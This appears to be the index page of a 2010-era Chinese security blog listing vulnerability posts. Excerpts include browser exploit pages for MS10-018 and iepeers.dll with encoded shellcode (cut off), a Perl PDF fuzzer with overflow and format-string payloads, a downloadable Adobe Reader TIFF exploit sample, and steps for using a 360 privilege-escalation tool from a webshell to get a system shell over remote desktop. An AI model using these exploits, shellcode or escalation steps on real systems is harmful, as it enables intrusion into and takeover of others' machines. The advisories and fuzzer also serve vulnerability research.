欢迎信息安全界的朋友!黑站、挂马的勿扰!只做基础理论研究。交流IDS、IPS、buffer overflow、内核编程 、sniffer,技术共享!

                                                 
              .                 .    . . .                  
             .                        .        .            
         'BBNNNN                        .  .                
          N                      .       .     .            
         N                         .   .   .                
         N.  .                        .                     
        N  .   .                  .  N   .  NN              
        B   .                       NN.     NN              
       NN                  .  .     BN      NN              
       N .  . .           .      .  ND.     NN              
       N. .                ..  .    NN .    NN              
       N    ..                   .  NB      NN              
       N                 B. .       NN.     NN                    
       N  .               NN        NB .    NN              
       NNNBNNNN            B     .  N.      NN            
       N  .                        .N       NN              
 .     N                 .          N.      NN              
      .N   .            .   .    .  N  .  . BN  ..          
  ..  .B .   .     ..     .       . N       NN     .  .     
       N       NNN.  B.    .  .     N   NNNNNN NNN          
    .. N       N N  N  .NNNB    NNN.B. BN. NBN   B. B.      
      .B .   .   N NN . N N  . NB NBN .N    NN   N  N  .    
     .NN   .    N NN   .  B   .B .  N  N. . B    N.BN.      
  .   N         N N  .    NN   N  ..B. N .  N   .B NN       
      N         NN       NNN   N  NNN  N   NB   NNNN        
  . . B.        BN       NN  .  NNN NN NNNNNN. .NB N  .     
      N         N  . .              . . NN . N.  . N        
   .  N          .                        . .  .  .B   .    
    . D.        .    .      .    .     .      .    N.       
      N          .      .  '    .            .     N  .     
      N          .  .     .       .       .        N  .     
  .             .               .             .   NN .      
                                    . .           N   .     
                                  .        .   .  N .       
                                         .  .     N. ..     
                                    .     .      NN    .    
                                .     . .    NNBNB. '       
                                 . .  BNBNNNNN         .    
                                . .   . . .           .     
                                 .    .      .                                                                                                                

预览模式: 普通 | 列表

CVE-2010-1297那个Adobe洞的内幕

Adobe近日发布了一个安全公告,称Flash Player、Adobe Reader和Acrobat中存在一个严重安全漏洞,该漏洞(CVE-2010-1297)可导致应用程序崩溃或使攻击者控制受影响系统,Adobe表示已经接到有黑客利用该漏洞进行攻击的报告。目前Adobe尚未提供官方修补方案,但Flash Player 10.1 Release Candidate不受此漏洞影响,用户可下载使用或采取以下临时解决方案,以避免受到漏洞威胁。

查看更多...

分类:漏洞公告 | 固定链接 | 评论: 14 | 引用: 0 | 查看次数: 21104

恩。。。。。

分类:水谭 | 固定链接 | 评论: 8 | 引用: 0 | 查看次数: 15940

MS IE MS10018 Exploit Published

Title : Microsoft Internet Explorer Code Execution Vulnerabilities (MS10-018)
VUPEN ID : VUPEN/ADV-2010-0744
CVE ID : CVE-2010-0267 - CVE-2010-0488 - CVE-2010-0489 - CVE-2010-0490 - CVE-2010-0491 - CVE-2010-0492 - CVE-2010-0494 - CVE-2010-0805 - CVE-2010-0806 - CVE-2010-0807
 

/*ms10018 Exploit*/

<html><body>
<script>
var cn = new Array();
var shellcode = unescape( '%uf946%u41fd%u9f4f%uf83f%u4a4e%ufc9b%u9b27%u9f42%u48f5%u4e9b%u46fc%u994f%u4f9f%ufc4f%u9892%u46fc%u99f5%u463f%u9293%u4afc%u4043%ud693%u9242%ud64f%u9643%u484f%u9743%u27f8%u27d6%u4347%u2791%uf948%u4a91%u9b9f%u37fc%

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 5 | 引用: 0 | 查看次数: 16148

PDF File Standard Fuzzer

#!/usr/bin/perl
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# PDF FUZZER -- TAKE IT TO THE HEAD
# :) HAVE FUN :)

use PDF::Create;
use Getopt::Std;

@overflow = ('A' x 8200, 'A' x 11000, 'A' x 110000, 'A' x 550000, 'A' x 1100000, 'A' x 2200000, 'A' x 12000000, "\0x99" x 1200, "//AAAA" x 250, "\\AAAA" x 250);

@fmtstring = ("%n%n%n%n%n", "%p%p%p%p%p", "%s%s%s%s%s", "%d%d%d%d%d", "%x%x%x%x%x",
 

查看更多...

分类:漏洞挖掘 | 固定链接 | 评论: 37 | 引用: 0 | 查看次数: 18564

Adobe Reader 《=9.3.0 TIFF 漏洞

样本:

下载文件 点击下载此文件

打开后pop up MessageBox

查看更多...

分类:缓冲区溢出 | 固定链接 | 评论: 5 | 引用: 0 | 查看次数: 14298

Microsoft Internet Explorer iepeers.dll 样本

<html><body>
<button id='mybtn' onclick='crash();' style='display:none'></button>
<script language='javascript'>
function myfun1(){
    var shellcode = unescape('%u9999%u96fd%u3f46%u4a9f%u4a4f%uf542%u3748%u4346%u9992%u99f5%u2f47%u924f%ud69f%u3f37%uf546%u3f49%ufdf8%u3f41%u9f43%ud646%ufd3f%u42f8%u4e98%u9190%ud697%u4837%u4e3f%uf54b%u9147%u91f9%uf93f%u4e90%u4e90%u9148%uf596%uf998%u9837%u4a93%u4391%

查看更多...

分类:0day | 固定链接 | 评论: 1 | 引用: 0 | 查看次数: 44987

360本地提权webshell下测试程序

测试方法:
在webshell下运行360test.exe

成功后,3389到服务器,按5下shift,得到一个cmd

查看更多...

分类:漏洞公告 | 固定链接 | 评论: 31 | 引用: 0 | 查看次数: 21510

Aurora 确定了

##看到HDM的这个可以确定了 ,世界又要开始新的一轮疯狂了
# $Id: ie_aurora.rb 8136 2010-01-15 21:36:04Z hdm $
##

##

查看更多...

分类:漏洞公告 | 固定链接 | 评论: 32 | 引用: 0 | 查看次数: 8496